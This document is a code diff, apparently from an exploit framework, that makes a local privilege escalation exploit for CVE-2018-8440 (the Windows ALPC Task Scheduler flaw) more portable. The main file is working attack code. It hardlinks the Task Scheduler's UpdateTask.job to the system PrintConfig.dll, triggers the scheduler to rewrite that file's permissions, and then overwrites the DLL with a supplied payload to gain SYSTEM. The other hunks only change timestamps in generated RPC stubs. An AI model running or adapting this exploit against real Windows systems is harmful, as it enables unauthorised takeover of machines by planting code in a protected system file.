Use System Directory

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/ALPC-TaskSched-LPE.cpp

@@ -84,36 +84,40 @@ int mainf()
 	//When this happens this code has no garantuee that it will target the dll that ends up getting loaded... and you really want to avoid this.
 	WIN32_FIND_DATA FindFileData;
 	HANDLE hFind;
+	wchar_t searchLoc[MAX_PATH], prntCnfg[MAX_PATH];
+	UINT szPath = 0, szPath1 = 0;
+	szPath = GetSystemDirectory(searchLoc, MAX_PATH);
+	szPath1 = GetSystemDirectory(prntCnfg, MAX_PATH);
+	if (szPath == 0 || szPath1 == 0){
+		return (-1);
+	}
+	wcscat(searchLoc, L"\\DriverStore\\FileRepository\\prnms003.inf_amd64*");
+	wcscat(prntCnfg, L"\\DriverStore\\FileRepository\\");
 
-	hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData);
-	wchar_t BeginPath[MAX_PATH] = L"c:\\windows\\system32\\DriverStore\\FileRepository\\";
+	hFind = FindFirstFile(searchLoc, &FindFileData);
 	wchar_t PrinterDriverFolder[MAX_PATH];
 	wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
 	wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
 	FindClose(hFind);
-	wcscat(BeginPath, PrinterDriverFolder);
-	wcscat(BeginPath, EndPath);
+	wcscat(prntCnfg, PrinterDriverFolder);
+	wcscat(prntCnfg, EndPath);
 
 	//Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of
-	CreateNativeHardlink(L"c:\\windows\\tasks\\UpdateTask.job", BeginPath);
+	wchar_t jobPath[MAX_PATH];
+	szPath = GetSystemWindowsDirectory(jobPath, MAX_PATH);
+	if (szPath == 0){
+		return (-1);
+	}
+	wcscat(jobPath, L"\\tasks\\UpdateTask.job");
+	CreateNativeHardlink(jobPath, prntCnfg);
 	RunExploit();
 
-	//Must be name of final DLL.. might be better ways to grab the handle
-	//HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE");
-
-	//Payload is included as a resource, you need to modify this resource accordingly.
-	//HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
 	HANDLE hPayload = ::CreateFile(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 	if (hPayload == INVALID_HANDLE_VALUE) {
 		return(-1);
 	}
 
-	//unsigned int myResourceSize = ::SizeofResource(mod, myResource);
-	//HGLOBAL myResourceData = ::LoadResource(mod, myResource);
-	//void* pMyBinaryData = ::LockResource(myResourceData);
-
 	DWORD payloadSize = ::GetFileSize(hPayload, NULL);
-	WCHAR msg[32];
 
 	VOID* payloadBuffer = malloc(payloadSize);
 	if (payloadBuffer == NULL) {
@@ -130,7 +134,7 @@ int mainf()
 	HANDLE hFile;
 	DWORD dwBytesWritten = 0;
 	do {
-		hFile = CreateFile(BeginPath, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+		hFile = CreateFile(prntCnfg, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
 		WriteFile(hFile, (char*)payloadBuffer, bytesRead, &dwBytesWritten, NULL);
 		if (hFile == INVALID_HANDLE_VALUE)
 		{

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_c.c

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Mon Sep 17 17:16:17 2018
+/* at Wed Sep 19 07:57:18 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_h.h

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Mon Sep 17 17:16:17 2018
+/* at Wed Sep 19 07:57:18 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603 

external/source/exploits/CVE-2018-8440/dll/ALPC-TaskSched-LPE/rpc_s.c

@@ -4,7 +4,7 @@
 
 
  /* File created by MIDL compiler version 8.00.0603 */
-/* at Mon Sep 17 17:16:17 2018
+/* at Wed Sep 19 07:57:18 2018
  */
 /* Compiler settings for rpc.idl:
     Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.00.0603